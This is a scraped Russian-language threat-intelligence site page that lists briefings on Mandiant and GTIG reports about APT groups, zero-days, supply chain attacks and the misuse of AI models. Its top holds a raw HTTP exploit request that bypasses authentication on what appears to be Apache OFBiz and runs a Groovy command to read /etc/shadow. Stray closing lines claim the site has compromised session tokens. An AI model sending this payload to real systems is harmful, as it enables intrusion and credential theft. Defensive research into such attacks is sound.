Автор не согласен с мнением Mandiant и Google. Публикации носят научно-исследовательский характер.
POST /webtools/control/forgotPassword;/ProgramExport HTTP/1.1
Host: 127.0.0.1:8443
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

groovyProgram=throw+new+Exception('cat+/etc/shadow'.execute().text);
Узнайте, как защититься от киберпреступников и предотвратить кибератаки.
Threat intelligence — это исследования, направленные на изучение самых опасных кибернетических мафиозных структур мира. На нашем сайте вы найдёте информацию о последних кибератаках, взломах, утечках данных и других угрозах. Мы анализируем методы, инструменты и уязвимости, которые используют кибермафии, чтобы помочь вам лучше понять, как они работают. Присоединяйтесь к нашему сообществу и будьте в курсе последних новостей и тенденций в области кибербезопасности.
APT0 расскажет, как киберразведка и OSINT помогают обнаруживать и предотвращать кибератаки, защищать критически важную инфраструктуру и привлекать киберпреступников к ответственности. Мы исследуем методы работы самых опасных advanced persistent threat's мира, чтобы вы могли быть на шаг впереди потенциальных угроз. Присоединяйтесь к нашему путешествию в мир цифровой безопасности!

Mandiant и GTIG описывают новую волну эксплуатации CVE-2026-35273 UNC6240 с расширением отраслей и обходом буквальных WAF-правил.

Mandiant даёт многоуровневый чертёж защиты SDLC: эндпоинты разработчиков, репозитории, сборка, артефакты и рантайм.

GTIG фиксирует переход злоумышленников от простых запросов к LLM к агентным сценариям и атакам на ИИ-активы.

GTIG: финансово мотивированный BREEZE COMET (ex-UNC5669) манипулирует Pix/STR/Boleto и банковским ПО; растёт интерес к AI и LatAm/Africa.

GTIG: UNC6293, UNC7005 и UNC5976 злоупотребляют легитимными auth-потоками против академиков, дипломатов и think tank в ЕС и США.

Mandiant раскрывает архитектуру AVDH: мультиагентный harness для поиска уязвимостей с human-in-the-loop и связкой с CodeMender.

GTIG: после «ухода» BlackFile кластер UNC6671 работает под Redact, Pink, Helix и Falcon против финансов и enterprise SaaS.

GTIG и Mandiant: open source supply chain растёт быстрее классических SolarWinds-сценариев — чеклист hardening и governance.

GTIG унифицирует трекинг Mandiant и TAG: двухсловные криптонимы вроде CASTLE, ION, NEPTUNE, RELIC, COMET.

Mandiant о guardrails для LLM‑агентов в vuln management на фоне отрицательного mean time-to-exploit.

Mandiant о публичных serverless-приложениях без аутентификации, рисках Cloud Run и практиках hardening.

Совместные действия против сети NetNut (Popa) после январского удара по IPIDEA: аккаунты, SDK и Play Protect.

GTIG о возврате IO‑экосистемы к глобальным приоритетам, хактивизме и генеративном ИИ в контенте.

GTIG о кампании PRC‑nexus актора против академических, медицинских и военно‑медицинских структур Северной Америки.

Mandiant/GTIG о zero‑day CVE-2026-35273 в Environment Management и кампании UNC6240 против высшего образования.

Майский отчёт GTIG: от AI-assisted zero-day у киберкриминала до PROMPTSPY, supply chain UNC6780 и обфускации LLM-доступов.

Francis deSouza и GTIG/Mandiant о сжатии окна эксплуатации и дорожной карте AI‑интегрированной защиты.

GTIG о supply chain атаке на axios 1.14.1 и 0.30.4 через зависимость plain-crypto-js и бэкдор WAVESHAPER.V2.

Брифинг APT0 по M-Trends 2026: данные Mandiant за 2025 год, медианное dwell time, vishing, SaaS и атаки на восстановление.

Брифинг APT0 по отчёту Mandiant/GTIG о тактиках ransomware в 2025: начальный доступ, кража данных, атаки на виртуализацию и REDBIKE.

Брифинг APT0 по отчёту GTIG: 90 zero-day в 2025 году, рост атак на enterprise и edge, роль CSV и рекомендации защитникам.

GTIG о model extraction, усилении фишинга с LLM и экспериментах с AI‑связанным вредоносом в конце 2025.

Mandiant о вторжении UNC1069 в FinTech/DeFi: Telegram, фейковый Zoom, ClickFix и новый стек сбора данных.

Брифинг APT0 по Cybersecurity Forecast 2026 от Google Threat Intelligence: ожидания по AI, ransomware, виртуализации и госструктурам.

Брифинг APT0 по кампании UNC6293: социальная инженерия вокруг application-specific passwords против академиков и критиков России.

Брифинг APT0 по M-Trends 2025: итоги расследований Mandiant за 2024 год, векторы доступа, отрасли и рекомендации.

Брифинг APT0 по отчёту GTIG об adversarial misuse Gemini: продуктивность атакующих без прорыва в новых возможностях.

Брифинг APT0 по материалу Mandiant об APT29: рост операций против дипмиссий, смена delivery-цепочек и фокус на Украине.

Брифинг APT0 по анализу Mandiant: стандартный playbook ГРУ для disruptive-операций — edge, living off the land, GPO, wiper и Telegram-нарратив.

Брифинг APT0 по объяснению Mandiant: что такое UNC-группы, зачем они нужны защитникам и как из них вырастают APT и FIN.

APT0 демонстрирует новую технологию, которая может быть использована для обхода всех трех существующих типов изоляции браузера.

Злоумышленник может создавать пользователей с произвольными уровнями ролей, включая администраторов.

This website has compromised your session tokens
I like to take risks